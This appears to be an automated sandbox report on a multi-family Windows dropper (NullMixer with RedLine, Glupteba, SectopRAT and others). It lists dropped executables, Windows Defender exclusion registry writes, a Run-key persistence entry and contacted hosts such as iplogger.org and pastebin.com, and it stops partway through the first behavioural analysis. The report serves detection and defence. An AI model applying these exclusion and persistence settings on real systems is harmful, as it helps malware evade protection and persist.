Malware Analysis Report

2024-11-13 19:29

Sample ID 241109-1a6llavqek
Target ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f
SHA256 ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f
Tags
fabookie glupteba nullmixer privateloader redline sectoprat socelars @wadiller0 media22test user01new aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rat rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f

Threat Level: Known bad

The file ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f was found to be: Known bad.

Malicious Activity Summary

fabookie glupteba nullmixer privateloader redline sectoprat socelars @wadiller0 media22test user01new aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rat rootkit spyware stealer trojan

SectopRAT payload

PrivateLoader

Glupteba

Fabookie family

SectopRAT

Socelars family

Nullmixer family

Sectoprat family

Privateloader family

Detect Fabookie payload

RedLine payload

Redline family

Fabookie

Glupteba family

NullMixer

RedLine

Windows security bypass

Socelars payload

Socelars

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

ASPack v2.12-2.42

Executes dropped EXE

Windows security modification

Checks computer location settings

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Manipulates WinMonFS driver.

Checks installed software on the system

Looks up geolocation information via web service

Looks up external IP address via web service

Manipulates WinMon driver.

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

System Location Discovery: System Language Discovery

Program crash

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 21:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 21:27

Reported

2024-11-09 21:30

Platform

win7-20241023-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YFBh.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrimsonSnow = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\is-5Q2U2.tmp C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259443562 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\is-3NF46.tmp C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\is-7MSSK.tmp C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
